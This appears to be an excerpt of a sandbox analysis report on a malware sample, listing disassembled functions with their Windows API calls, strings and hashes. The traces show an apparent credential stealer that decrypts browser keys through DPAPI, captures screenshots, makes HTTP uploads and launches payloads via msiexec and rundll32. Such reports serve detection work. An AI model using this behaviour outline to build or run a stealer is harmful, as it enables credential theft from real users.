                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                            • String ID: "$"$------$------$------
                                                            • API String ID: 2402878923-2180234286
                                                            • Opcode ID: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                                            • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                                            • Opcode Fuzzy Hash: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                                            • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                                                            Function 0040C990 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00879330,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                                            • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                                            • StrStrA.SHLWAPI(?,00879378,00420B52), ref: 0040CAF7
                                                            • StrStrA.SHLWAPI(00000000,00879630), ref: 0040CB1E
                                                            • StrStrA.SHLWAPI(?,00879C18,00000000,?,00421458,00000000,?,00000000,00000000,?,008761C0,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                                            • StrStrA.SHLWAPI(00000000,00879878), ref: 0040CCB9
                                                              • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                                              • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,008761F0), ref: 0040C871
                                                              • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                              • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                            • StrStrA.SHLWAPI(?,00879878,00000000,?,0042145C,00000000,?,00000000,008761F0), ref: 0040CD5A
                                                            • StrStrA.SHLWAPI(00000000,00876150), ref: 0040CD71
                                                              • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                              • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                              • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                            • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                                            • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                            • String ID:
                                                            • API String ID: 3555725114-3916222277
                                                            • Opcode ID: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                                            • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                                            • Opcode Fuzzy Hash: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                                            • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                                            Function 022DCBF7 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 022DCCD3
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 022DCCF0
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 022DCCFC
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 022DCD0F
                                                            • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 022DCD1C
                                                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 022DCD40
                                                            • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 022DCD5E
                                                            • StrStrA.SHLWAPI(00000000,0064A364), ref: 022DCD85
                                                            • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 022DCF09
                                                            • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 022DCF20
                                                              • Part of subcall function 022DCA87: memset.MSVCRT ref: 022DCABA
                                                              • Part of subcall function 022DCA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 022DCAD8
                                                              • Part of subcall function 022DCA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 022DCAE3
                                                              • Part of subcall function 022DCA87: memcpy.MSVCRT(?,?,?), ref: 022DCB79
                                                            • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 022DCFC1
                                                            • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 022DCFD8
                                                              • Part of subcall function 022DCA87: lstrcat.KERNEL32(?,00420B46), ref: 022DCBAA
                                                              • Part of subcall function 022DCA87: lstrcat.KERNEL32(?,00420B47), ref: 022DCBBE
                                                              • Part of subcall function 022DCA87: lstrcat.KERNEL32(?,00420B4E), ref: 022DCBDF
                                                            • lstrlen.KERNEL32(00000000), ref: 022DD0AB
                                                            • CloseHandle.KERNEL32(00000000), ref: 022DD103
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                            • String ID:
                                                            • API String ID: 3555725114-3916222277
                                                            • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                                            • Instruction ID: 7a30f4c0399331f6f53a97a7d2ae2789a9cc34d3b0ed18b9c76773a63c979b17
                                                            • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                                            • Instruction Fuzzy Hash: 64E1EC76920308ABCF14EBE4DD95EEEB77AAF64300F404159F107A6194EF346A89DF60
                                                            Function 00418320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • RegOpenKeyExA.ADVAPI32(00000000,00877378,00000000,00020019,00000000,004205B6), ref: 004183A4
                                                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                                            • wsprintfA.USER32 ref: 00418459
                                                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                            • String ID: - $%s\%s$?
                                                            • API String ID: 3246050789-3278919252
                                                            • Opcode ID: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                                            • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                                            • Opcode Fuzzy Hash: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                                            • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                                            Function 00410A60 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 205stringprocesssynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • memset.MSVCRT ref: 00410C1C
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                            • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                            • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                                            • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                                            • lstrlenA.KERNEL32(?), ref: 00410CA7
                                                            • memset.MSVCRT ref: 00410CCD
                                                            • memset.MSVCRT ref: 00410CE1
                                                              • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00876340,?,0042110C,?,00000000), ref: 0041A82B
                                                              • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                              • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00845370,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                            • String ID: .exe
                                                            • API String ID: 1395395982-4119554291
                                                            • Opcode ID: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                            • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                                            • Opcode Fuzzy Hash: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                            • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                                            Function 00419010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateGlobalStream
                                                            • String ID: image/jpeg
                                                            • API String ID: 2244384528-3785015651
                                                            • Opcode ID: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                            • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                                            • Opcode Fuzzy Hash: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                            • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                                            Function 004112D0 Relevance: 19.8, APIs: 13, Instructions: 308stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • strtok_s.MSVCRT ref: 00411307
                                                            • strtok_s.MSVCRT ref: 00411750
                                                              • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00876340,?,0042110C,?,00000000), ref: 0041A82B
                                                              • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: strtok_s$lstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 348468850-0
                                                            • Opcode ID: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                            • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                                            • Opcode Fuzzy Hash: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                            • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                                            Function 00412E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExecuteShell$lstrcpy
                                                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                                            • API String ID: 2507796910-3625054190
                                                            • Opcode ID: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                            • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                                            • Opcode Fuzzy Hash: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                            • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                                                            Function 00414280 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0041429E
                                                            • memset.MSVCRT ref: 004142B5
                                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                                            • lstrcatA.KERNEL32(?,008790D8), ref: 0041430B
                                                            • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                                            • lstrcatA.KERNEL32(?,00879738), ref: 00414333
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                              • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                              • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                              • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                              • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                              • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                              • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                              • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                              • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                              • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                                            • StrStrA.SHLWAPI(?,0087A7D0), ref: 004143F3
                                                            • GlobalFree.KERNEL32(?), ref: 00414512
                                                              • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                              • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                              • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                              • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                              • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                                            • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                                            • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                                            • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                                            • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                            • String ID:
                                                            • API String ID: 1191620704-0
                                                            • Opcode ID: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                            • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                                            • Opcode Fuzzy Hash: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                            • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                                            Function 022E44E7 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 022E4505
                                                            • memset.MSVCRT ref: 022E451C
                                                              • Part of subcall function 022E9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022E9072
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E4553
                                                            • lstrcat.KERNEL32(?,0064A30C), ref: 022E4572
                                                            • lstrcat.KERNEL32(?,?), ref: 022E4586
                                                            • lstrcat.KERNEL32(?,0064A5D8), ref: 022E459A
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022E8FF7: GetFileAttributesA.KERNEL32(00000000,?,022D1DBB,?,?,0042565C,?,?,00420E1F), ref: 022E9006
                                                              • Part of subcall function 022D9F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 022D9FA0
                                                              • Part of subcall function 022D9F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 022D9FF9
                                                              • Part of subcall function 022D9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022D9C53
                                                              • Part of subcall function 022D9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022D9C78
                                                              • Part of subcall function 022D9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022D9C98
                                                              • Part of subcall function 022D9C27: ReadFile.KERNEL32(000000FF,?,00000000,022D16F6,00000000), ref: 022D9CC1
                                                              • Part of subcall function 022D9C27: LocalFree.KERNEL32(022D16F6), ref: 022D9CF7
                                                              • Part of subcall function 022D9C27: CloseHandle.KERNEL32(000000FF), ref: 022D9D01
                                                              • Part of subcall function 022E9627: GlobalAlloc.KERNEL32(00000000,022E4644,022E4644), ref: 022E963A
                                                            • StrStrA.SHLWAPI(?,0064A0D8), ref: 022E465A
                                                            • GlobalFree.KERNEL32(?), ref: 022E4779
                                                              • Part of subcall function 022D9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022D5155,00000000,00000000), ref: 022D9D56
                                                              • Part of subcall function 022D9D27: LocalAlloc.KERNEL32(00000040,?,?,?,022D5155,00000000,?), ref: 022D9D68
                                                              • Part of subcall function 022D9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022D5155,00000000,00000000), ref: 022D9D91
                                                              • Part of subcall function 022D9D27: LocalFree.KERNEL32(?,?,?,?,022D5155,00000000,?), ref: 022D9DA6
                                                              • Part of subcall function 022DA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022DA094
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E470A
                                                            • StrCmpCA.SHLWAPI(?,004208D1), ref: 022E4727
                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 022E4739
                                                            • lstrcat.KERNEL32(00000000,?), ref: 022E474C
                                                            • lstrcat.KERNEL32(00000000,00420FB8), ref: 022E475B
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                            • String ID:
                                                            • API String ID: 1191620704-0
                                                            • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                            • Instruction ID: 9f76b99db6c1d1b8667cebf9b2c3c177e82e0d579a2785da4de87d1280749433
                                                            • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                            • Instruction Fuzzy Hash: 047151B6910218BBDF14FBE0DC89FEE737AAB49300F408598E60696184EB75D748CF91
                                                            Function 00401310 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 00401327
